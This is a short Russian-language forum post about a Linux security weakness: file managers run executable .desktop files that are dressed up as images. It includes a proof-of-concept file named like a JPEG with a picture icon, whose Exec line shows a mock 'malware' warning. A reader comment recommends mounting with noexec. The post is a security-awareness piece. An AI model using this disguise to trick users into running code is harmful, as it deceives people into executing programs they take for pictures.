mealsforall 31.01.2017 22:34

Talks!Как обмануть линуксоида, чтоб заставить кликнуть на скрипт

Оригинал
Очень просто. Вот картинки в папке:

картинки

А вот что будет, если на них кликнуть:


Ой, алерт: Результат кликанья на картинку

А всё потому, что файловые менеджеры Линукса легкомысленно относятся к файлам .desktop, у которых выставлен executable bit.

1
2
3
4
5
6
7
8
9
[test@localhost wallpaper_collection]$ cat Bokeh_Tails.desktop

[Desktop Entry]
Name=Bokeh_Tails.jpg
Exec=sh -c 'zenity --warning --text "Congratulation!\nGNOME Malware 3.22 successfully infected your system."'
Terminal=false
Icon=/usr/share/backgrounds/gnome/Bokeh_Tails.jpg
Type=Application
Categories=Graphics



Будь бдителен, ЮЗЕРНЕЙМ!

Больше деталей смотри в оригинальной статье.


Тэги: безопасность файловые менеджеры
+ 0 -
Похожие Поделиться

dront78 23.02.2017 12:02 #
noexec в fstab никто не отменял